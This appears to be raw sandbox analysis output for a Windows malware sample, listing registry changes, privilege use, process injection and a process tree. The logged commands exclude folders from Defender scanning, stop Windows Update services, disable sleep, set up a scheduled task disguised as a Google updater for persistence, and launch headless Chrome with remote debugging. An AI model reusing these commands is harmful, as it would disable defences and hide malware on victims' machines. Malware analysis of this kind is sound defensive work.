Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4612 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4612 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4612 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4828 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4828 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4612 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4612 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4612 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2888 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2888 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2888 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2888 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2888 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3060 wrote to memory of 4140 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 4140 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 868 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 868 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 4548 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 4548 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 2252 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 2252 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 2308 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3060 wrote to memory of 2308 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4724 wrote to memory of 1144 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 1144 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 3740 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4724 wrote to memory of 3740 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4612 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4612 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4612 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2084 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2084 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2888 -ip 2888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=32378 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9aa3c9758,0x7ff9aa3c9768,0x7ff9aa3c9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1380 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1668 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

